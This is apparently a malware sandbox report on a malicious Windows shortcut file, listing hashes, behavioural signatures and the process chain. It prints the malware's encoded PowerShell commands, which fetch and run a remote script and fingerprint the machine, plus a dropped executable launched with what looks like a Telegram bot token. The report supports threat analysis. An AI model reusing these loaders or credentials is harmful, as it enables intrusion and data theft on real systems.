Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
139s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20230915-en -
resource tags
arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system -
submitted
20/09/2023, 15:54
Static task
static1
Behavioral task
behavioral1
Sample
tmpyl4tkeg5.lnk
Resource
win7-20230831-en
Behavioral task
behavioral2
Sample
tmpyl4tkeg5.lnk
Resource
win10v2004-20230915-en
General
-
Target
tmpyl4tkeg5.lnk
-
Size
6.0MB
-
MD5
e4c11bee612af2f2f0d1361b098e456d
-
SHA1
6f781c365ee30354378c3a671694976c6931e0de
-
SHA256
6d51b225bf9e61258f0a40274f0427d8b27a57f11d6a23b7371587b1d1fcde82
-
SHA512
78bc40ad85bfdb510c3502ac2e15e44e8d15eed226452bc52a004e1fb82a93b95abcad199fd38da45d224176a8c86db29ee87421ece0ed03aeca5acecbcc5578
-
SSDEEP
384:9D0kk0QMlgiCvN0kkj1KcMz0kk3B0kk7WShStbMS7StxSPE0kkdsHZ:9D3kIlS3kj1Kce3kR3k7WwwMGOt3kdQ
Malware Config
Extracted
https://wordpress.d
Signatures
-
Detect suspicious LNK files with LOLBins [1ZRR4H] 1 IoCs
resource yara_rule behavioral2/files/0x000700000002305d-2.dat LNK_sospechosos -
Blocklisted process makes network request 2 IoCs
flow pid Process 26 4676 powershell.exe 31 1764 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Control Panel\International\Geo\Nation cmd.exe -
Executes dropped EXE 1 IoCs
pid Process 3772 svczHost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 4240 WINWORD.EXE 4240 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 4060 powershell.exe 4060 powershell.exe 4676 powershell.exe 4676 powershell.exe 1764 powershell.exe 1764 powershell.exe 2672 powershell.exe 2672 powershell.exe 3772 svczHost.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4060 powershell.exe Token: SeDebugPrivilege 4676 powershell.exe Token: SeDebugPrivilege 1764 powershell.exe Token: SeIncreaseQuotaPrivilege 4676 powershell.exe Token: SeSecurityPrivilege 4676 powershell.exe Token: SeTakeOwnershipPrivilege 4676 powershell.exe Token: SeLoadDriverPrivilege 4676 powershell.exe Token: SeSystemProfilePrivilege 4676 powershell.exe Token: SeSystemtimePrivilege 4676 powershell.exe Token: SeProfSingleProcessPrivilege 4676 powershell.exe Token: SeIncBasePriorityPrivilege 4676 powershell.exe Token: SeCreatePagefilePrivilege 4676 powershell.exe Token: SeBackupPrivilege 4676 powershell.exe Token: SeRestorePrivilege 4676 powershell.exe Token: SeShutdownPrivilege 4676 powershell.exe Token: SeDebugPrivilege 4676 powershell.exe Token: SeSystemEnvironmentPrivilege 4676 powershell.exe Token: SeRemoteShutdownPrivilege 4676 powershell.exe Token: SeUndockPrivilege 4676 powershell.exe Token: SeManageVolumePrivilege 4676 powershell.exe Token: 33 4676 powershell.exe Token: 34 4676 powershell.exe Token: 35 4676 powershell.exe Token: 36 4676 powershell.exe Token: SeIncreaseQuotaPrivilege 4676 powershell.exe Token: SeSecurityPrivilege 4676 powershell.exe Token: SeTakeOwnershipPrivilege 4676 powershell.exe Token: SeLoadDriverPrivilege 4676 powershell.exe Token: SeSystemProfilePrivilege 4676 powershell.exe Token: SeSystemtimePrivilege 4676 powershell.exe Token: SeProfSingleProcessPrivilege 4676 powershell.exe Token: SeIncBasePriorityPrivilege 4676 powershell.exe Token: SeCreatePagefilePrivilege 4676 powershell.exe Token: SeBackupPrivilege 4676 powershell.exe Token: SeRestorePrivilege 4676 powershell.exe Token: SeShutdownPrivilege 4676 powershell.exe Token: SeDebugPrivilege 4676 powershell.exe Token: SeSystemEnvironmentPrivilege 4676 powershell.exe Token: SeRemoteShutdownPrivilege 4676 powershell.exe Token: SeUndockPrivilege 4676 powershell.exe Token: SeManageVolumePrivilege 4676 powershell.exe Token: 33 4676 powershell.exe Token: 34 4676 powershell.exe Token: 35 4676 powershell.exe Token: 36 4676 powershell.exe Token: SeIncreaseQuotaPrivilege 4676 powershell.exe Token: SeSecurityPrivilege 4676 powershell.exe Token: SeTakeOwnershipPrivilege 4676 powershell.exe Token: SeLoadDriverPrivilege 4676 powershell.exe Token: SeSystemProfilePrivilege 4676 powershell.exe Token: SeSystemtimePrivilege 4676 powershell.exe Token: SeProfSingleProcessPrivilege 4676 powershell.exe Token: SeIncBasePriorityPrivilege 4676 powershell.exe Token: SeCreatePagefilePrivilege 4676 powershell.exe Token: SeBackupPrivilege 4676 powershell.exe Token: SeRestorePrivilege 4676 powershell.exe Token: SeShutdownPrivilege 4676 powershell.exe Token: SeDebugPrivilege 4676 powershell.exe Token: SeSystemEnvironmentPrivilege 4676 powershell.exe Token: SeRemoteShutdownPrivilege 4676 powershell.exe Token: SeUndockPrivilege 4676 powershell.exe Token: SeManageVolumePrivilege 4676 powershell.exe Token: 33 4676 powershell.exe Token: 34 4676 powershell.exe -
Suspicious use of SetWindowsHookEx 8 IoCs
pid Process 4240 WINWORD.EXE 4240 WINWORD.EXE 4240 WINWORD.EXE 4240 WINWORD.EXE 4240 WINWORD.EXE 4240 WINWORD.EXE 4240 WINWORD.EXE 4240 WINWORD.EXE -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 1704 wrote to memory of 4060 1704 cmd.exe 86 PID 1704 wrote to memory of 4060 1704 cmd.exe 86 PID 4060 wrote to memory of 4676 4060 powershell.exe 87 PID 4060 wrote to memory of 4676 4060 powershell.exe 87 PID 4676 wrote to memory of 1764 4676 powershell.exe 91 PID 4676 wrote to memory of 1764 4676 powershell.exe 91 PID 1764 wrote to memory of 4240 1764 powershell.exe 93 PID 1764 wrote to memory of 4240 1764 powershell.exe 93 PID 4676 wrote to memory of 3772 4676 powershell.exe 95 PID 4676 wrote to memory of 3772 4676 powershell.exe 95 PID 3772 wrote to memory of 2672 3772 svczHost.exe 97 PID 3772 wrote to memory of 2672 3772 svczHost.exe 97
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\tmpyl4tkeg5.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1704 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -WindowStyle hidden -ExecutionPolicy bypass -EncodedCommand JABzAGoAaQBqAHEAPQBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAiAFoAMABFADIAUQBVAFYARgBRAFYAVgAzAFEAawBSAEIAUgBXAHQAQgBVADEARgBCAGQAVQBGAEYAWQAwAEYAYQBVAFUASQB3AFEAVQBaAE4AUQBXAFIAQgBRAG4AbABCAFIAMgB0AEIAWQBtAGQAQwBiAGsARgBEAFoAMABGAFgAZAAwAEoAVQBRAFUAaAByAFEAVwBOADMAUQBqAEIAQgBSADEAVgBCAFkAbABGAEIAZABVAEYARgBUAFUARgBpAGQAMABKADEAUQBVAGgAWgBRAFYAcABSAFEAbgBsAEIAUwBGAEYAQgBXAEYARgBCAE4AawBGAEUAYgAwAEYAUwBaADAASgA1AFEAVQBjADQAUQBXAEoAUgBRAGsATgBCAFIAMABWAEIAWQAzAGQAQwBiAEUARgBFAFcAVQBGAE8AUQBVAEoAVQBRAFUAaABSAFEAVwBOAG4AUQBuAEIAQgBSAHoAUgBCAFcAbgBkAEIAYgAwAEYARABTAFUARgBhAFEAVQBKAFkAUQBVAFUAMABRAFUAMQBCAFEAbABwAEIAUgBtAE4AQgBZAFgAZABDAE0AVQBGAEgAVgBVAEYAVABRAFUASgB6AFEAVQBSAFoAUQBWAFIAQgBRAFgAbABCAFIAbQA5AEIAWQAwAEYAQwBhAFUARgBGAFkAMABGAFcAVQBVAEkAeQBRAFUAZABOAFEAVgBOAEIAUQBrADUAQgBTAEYAbABCAFcAbABGAEMAUwBFAEYARgBNAEUARgBrAGQAMABKAG8AUQBVAFoAbgBRAFYAcAAzAFEAagBGAEIAUgAwADEAQgBVADAARgBDAFQAawBGAEkAWgAwAEYASgBaADAARgB3AFEAVQBOAHIAUQBVADkAMwBRAFUAdABCAFEAMQBGAEIAWQBWAEYAQwBNAFUARgBJAGIAMABGAGkAUQBVAEoANgBRAFUAZABGAFEAVwBOAFIAUQBuAEYAQgBSAEQAQgBCAFYAMwBkAEMAVgBFAEYASQBhADAARgBqAGQAMABJAHcAUQBVAGQAVgBRAFcASgBSAFEAWABWAEIAUgBsAEYAQgBXAGwARgBDAE4ARQBGAEkAVQBVAEYATQBaADAASgBHAFEAVQBjADAAUQBWAGwAMwBRAG4AWgBCAFIAMQBGAEIAWQBWAEYAQwBkAFUARgBIAFkAMABGAFkAVQBVAEUAMgBRAFUAUgB2AFEAVgBGAFIAUQBsAFIAQgBSAFUAMQBCAFUAMQBGAEMAUwBrAEYARABOAEUARgBTAGQAMABKAHMAUQBVAGgAUgBRAFYAVgAzAFEAagBCAEIAUwBFAGwAQgBZAFYARgBDAGQAVQBGAEgAWQAwAEYATABRAFUASgBpAFEAVQBaAE4AUQBXAFYAUgBRAG4AcABCAFMARgBGAEIAVwBsAEYAQwBkAEUARgBEAE4ARQBGAFIAZAAwAEoAMgBRAFUAYwAwAFEAVwBSAG4AUQBtAHgAQgBTAEUAbABCAFoARQBGAEMAWgBFAEYARQBiADAARgBQAFoAMABKAEgAUQBVAGgASgBRAFcASgAzAFEAbgBSAEIAUgBVAGwAQgBXAFYARgBDAGUAawBGAEgAVgBVAEYATwBaADAARQB3AFEAVQBaAE4AUQBXAFIAQgBRAG4AbABCAFIAMgB0AEIAWQBtAGQAQwBiAGsARgBEAFoAMABGAEoAWgAwAEoAbwBRAFUAVgBuAFEAVgBWAG4AUQBYAGQAQgBSADAAMQBCAFUAMABGAEMAVABrAEYARQBXAFUARgBVAFEAVQBJADEAUQBVAFIAcgBRAFUAMQAzAFEAbQBsAEIAUgBFADEAQgBVADIAZABDAGMAawBGAEgAVABVAEYAVABRAFUASgBMAFEAVQBkADMAUQBWAGwAMwBRAFgAcABCAFIAVABCAEIAWgBGAEYAQwBZAFUARgBGAFIAVQBGAFEAVQBVAEUANQBRAFUATgBKAFEAVQB0AFIAUQBYAEIAQgBSAEgATgBCAFEAMgBkAEIAYQAwAEYASABUAFUARgBpAGQAMABKADEAUQBVAGgAUgBRAFYAcABSAFEAbgBWAEIAUwBGAEYAQgBTAFUARgBCAE8AVQBGAEQAUQBVAEYAVABVAFUASgAxAFEAVQBoAFoAUQBXAEoAMwBRAG4ASgBCAFIAMQBWAEIAVABGAEYAQwBXAEUARgBIAFYAVQBGAFoAWgAwAEoAVABRAFUAZABWAFEAVwBOAFIAUQBqAEYAQgBSADEAVgBCAFkAMwBkAEMATQBFAEYARABRAFUARgBNAFUAVQBKAFcAUQBVAGgASgBRAFcARgBSAFEAVwBkAEIAUQAyAGQAQgBTAGsARgBDAGMARQBGAEkAVgBVAEYAbABaADAASgB6AFEAVQBoAE4AUQBWAGwAUgBRAG4AaABCAFIAMgA5AEIAUwBVAEYAQgBjAGsARgBEAFEAVQBGAEsAUQBVAEoAeQBRAFUAYwB3AFEAVwBOAG4AUQBqAE4AQgBSAHoAUgBCAFkAawBGAEIAYwBFAEYARABRAFUARgBNAFUAVQBKAFcAUQBVAGgATgBRAFYAcABSAFEAawBOAEIAUgAwAFYAQgBZADMAZABDAGMARQBGAEgAVABVAEYAVgBRAFUASgBvAFEAVQBoAEoAUQBXAE4AMwBRAG4AQgBCAFIAegBSAEIAVwBuAGQAQgBTADAARgBGAGEAMABGAGkAWgAwAEkAeQBRAFUAYwA0AFEAVwBGADMAUQBtAHgAQgBRAHoAQgBCAFUAbABGAEMATgBFAEYASQBRAFUARgBqAFoAMABKAHMAUQBVAGgATgBRAFcATgAzAFEAbgBCAEIAUgB6AGgAQgBZAG0AZABCAFoAMABGAEQAVQBVAEYAWgBkADAASgAyAFEAVQBjADAAUQBXAFIAQgBRAG0AeABCAFIAegBSAEIAWgBFAEYAQgBkAFUARgBGAFQAVQBGAGkAZAAwAEoAMQBRAFUAaABSAFEAVgBwAFIAUQBuAFYAQgBTAEYARgBCAFEAMgBkAEIAUABRAD0APQAiACkAKQA7AAoAJABvAHYAawBrAGUAZgB1AGYAPQBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAiAEwAVQBWAHUAWQAyADkAawBaAFcAUgBEAGIAMgAxAHQAWQBXADUAawBJAEUAcABCAFEAbgBKAEIAUgB6AEIAQgBZADIAZABDAE0AMABGAEgATgBFAEYAaQBRAFUARQA1AFEAVQBaAHoAUQBWAFYAMwBRAGoAVgBCAFMARQAxAEIAWgBFAEYAQwBiAEUARgBIAE0ARQBGAE0AWgAwAEoAVgBRAFUAZABWAFEAVwBWAEIAUQBqAEIAQgBRAHoAUgBCAFUAbABGAEMAZABVAEYASABUAFUARgBpAGQAMABKAHIAUQBVAGQAcgBRAFcASgBuAFEAbQA1AEIAUgBqAEIAQgBUAHcAPQA9ACIAKQApADsACgAkAHYAcABqAGYAYwBrAGQAcgBhAGYAPQBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAiAFkAMwBWADAAYQBXADkAdQBVAEcAOQBzAGEAVwBOADUASQBHAEoANQBjAEcARgB6AGMAdwA9AD0AIgApACkAOwAKACQAeABwAGsAaABmAG4APQBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAiAEwAVQBWADQAWgBRAD0APQAiACkAKQA7AAoAJABnAGcAcQBkAG8AaQBzAGsAcwA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIATABWAGQAcABiAG0AUgB2AGQAMQBOADAAZQBXAHgAbABJAEcAaABwAFoARwBSAGwAYgBnAD0APQAiACkAKQA7AAoAJAB4AHgAcgB4AGIAagBhAGQAdgA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAIgApACkAOwAKACQAawBpAHMAYgBiAHMAYgA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIATABVADUAdgBVAEgASgB2AFoAbQBsAHMAWgBRAD0APQAiACkAKQA7AAoAJAB6AG8AeQBmAGYAawA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAIgApACkAOwAKACQAbwB3AHIAYgBoAGMAYwBiAHAAcgA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIATABVADUAdgBUAEcAOQBuAGIAdwA9AD0AIgApACkAOwAKACQAcgBzAHoAZQBkAHUAdQB0AHEAPQBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAiACIAKQApADsACgB3AGgAaQBsAGUAKAAkAHQAcgB1AGUAKQAKAHsACgAJAHQAcgB5AAoACQB7AAoACQAJAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnACAALQBWAGUAcgBiACAAcgB1AG4AYQBzACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACgAKAAkAHIAcwB6AGUAZAB1AHUAdABxACAAKwAgACQAbwB3AHIAYgBoAGMAYwBiAHAAcgApACwAIAAoACQAegBvAHkAZgBmAGsAIAArACAAJABrAGkAcwBiAGIAcwBiACkALAAgACgAJAB4AHgAcgB4AGIAagBhAGQAdgAgACsAIAAkAGcAZwBxAGQAbwBpAHMAawBzACkALAAgACgAJAB4AHAAawBoAGYAbgAgACsAIAAkAHYAcABqAGYAYwBrAGQAcgBhAGYAKQAsACAAKAAkAG8AdgBrAGsAZQBmAHUAZgAgACsAIAAkAHMAagBpAGoAcQApACkAOwAKAAkACQBlAHgAaQB0ADsACgAJAH0ACgAJAGMAYQB0AGMAaAAKAAkAewAKAAkAfQAKAH0ACgA=2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4060 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -WindowStyle hidden -ExecutionPolicy bypass -EncodedCommand JABrAG0AcgB3AG4AbAA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAZABXAE4AMABZAFcAawB1AGUASABsADYATAAyAFoAcABiAEcAVQB2AGMASABNAHYAZQBHAE0AdwBhAFgAZwB1AGMASABNAHgAIgApACkAOwAKACQAaQB1AHoAbABzAGEAcQBqAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAIgBhAEgAUgAwAGMASABNADYATAB5ADkAMwBiADMASgBrAGMASABKAGwAYwAzAE0AdQBaAEEAPQA9ACIAKQApADsACgAkAGMAbwBuAHQAZQBuAHQAIAA9ACAASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACgAJABpAHUAegBsAHMAYQBxAGoAIAArACAAJABrAG0AcgB3AG4AbAApACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwAKAEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgACQAYwBvAG4AdABlAG4AdAAuAEMAbwBuAHQAZQBuAHQACgA=3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4676 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile4⤵
- Blocklisted process makes network request
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1764 -
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\2.docx" /o ""5⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:4240
-
-
-
C:\Windows\Temp\svczHost.exe"C:\Windows\Temp\svczHost.exe" 6199273323:AAHXE-ke2qDK8FiwavkWDQ950wUMnOUMlfM -1001390383947 khiem24⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3772 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand CgBmAHUAbgBjAHQAaQBvAG4AIABHAGUAdAAtAEkAZABlAG4AdABpAHQAeQB7AAoAIAAgACAAIAAKACAAIAAgACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAEQAaQBzAGsARAByAGkAdgBlACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACIAIAAtAG8AcgAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACAALQAgAFMAUwBEACIAIAB9AAoAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAA9ACAAQAAoACkACgBmAG8AcgBlAGEAYwBoACAAKAAkAGgAYQByAGQARAByAGkAdgBlACAAaQBuACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACkAIAB7AAoAIAAgACAAIAAkAHMAZQByAGkAYQBsAE4AdQBtAGIAZQByACAAPQAgACQAaABhAHIAZABEAHIAaQB2AGUALgBTAGUAcgBpAGEAbABOAHUAbQBiAGUAcgAKACAAIAAgACAAJABtAG8AZABlAGwAIAA9ACAAJABoAGEAcgBkAEQAcgBpAHYAZQAuAE0AbwBkAGUAbAAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwAgAD0AIAAiAFMAZQByAGkAYQBsACAATgB1AG0AYgBlAHIAOgAgACQAcwBlAHIAaQBhAGwATgB1AG0AYgBlAHIALAAgAE0AbwBkAGUAbAA6ACAAJABtAG8AZABlAGwAIgAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAArAD0AIAAkAGQAcgBpAHYAZQBJAG4AZgBvAAoAfQAKACQAYwBvAG0AYgBpAG4AZQBkAEkAbgBmAG8AIAA9ACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAAtAGoAbwBpAG4AIAAiAGAAcgBgAG4AIgAKACQAYwBwAHUASQBuAGYAbwAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzAG8AcgAKACQAYwBwAHUARABlAHQAYQBpAGwAcwAgAD0AIAAiAFAAcgBvAGMAZQBzAHMAbwByAEkAZAA6ACAAJAAoACQAYwBwAHUASQBuAGYAbwAuAFAAcgBvAGMAZQBzAHMAbwByAEkAZAApACwAIABOAGEAbQBlADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATgBhAG0AZQApACwAIABNAGEAeABDAGwAbwBjAGsAUwBwAGUAZQBkADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATQBhAHgAQwBsAG8AYwBrAFMAcABlAGUAZAApACwAIABVAG4AaQBxAHUAZQBJAGQAOgAgACQAKAAkAGMAcAB1AEkAbgBmAG8ALgBVAG4AaQBxAHUAZQBJAGQAKQAiAAoAJABhAGwAbABJAG4AZgBvACAAPQAgACIAJABjAG8AbQBiAGkAbgBlAGQASQBuAGYAbwBgAHIAYABuACQAYwBwAHUARABlAHQAYQBpAGwAcwAiAAoAJABtAGQANQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AEMAcgB5AHAAdABvAFMAZQByAHYAaQBjAGUAUAByAG8AdgBpAGQAZQByAAoAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAYQBsAGwASQBuAGYAbwApAAoAJABoAGEAcwBoAEIAeQB0AGUAcwAgAD0AIAAkAG0AZAA1AC4AQwBvAG0AcAB1AHQAZQBIAGEAcwBoACgAJABiAHkAdABlAHMAKQAKACQAaABhAHMAaAAgAD0AIABbAEIAaQB0AEMAbwBuAHYAZQByAHQAZQByAF0AOgA6AFQAbwBTAHQAcgBpAG4AZwAoACQAaABhAHMAaABCAHkAdABlAHMAKQAgAC0AcgBlAHAAbABhAGMAZQAgACcALQAnAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAaABhAHMAaAA7AAoAfQAKACQAdABlAHMAdAAgAD0AIABHAGUAdAAtAEkAZABlAG4AdABpAHQAeQA7AAoAJAB0AGUAcwB0ACAAfAAgAE8AdQB0AC0ARgBpAGwAZQAgAC0ARgBpAGwAZQBQAGEAdABoACAAIgBkAGUAdgBpAGMAZQBJAGQALgB0AHgAdAAiACAALQBFAG4AYwBvAGQAaQBuAGcAIABVAFQARgA4AA==5⤵
- Suspicious behavior: EnumeratesProcesses
PID:2672
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
Filesize
1KB
MD57f2baf9f564f57b2d899d3ffeebc1e20
SHA15bfa2f385b3d91af6b2e2726133da0eced5e0c58
SHA25670076f6c9abc390f0da669fcff2505acd34df3f2f110410a97de38d957597d27
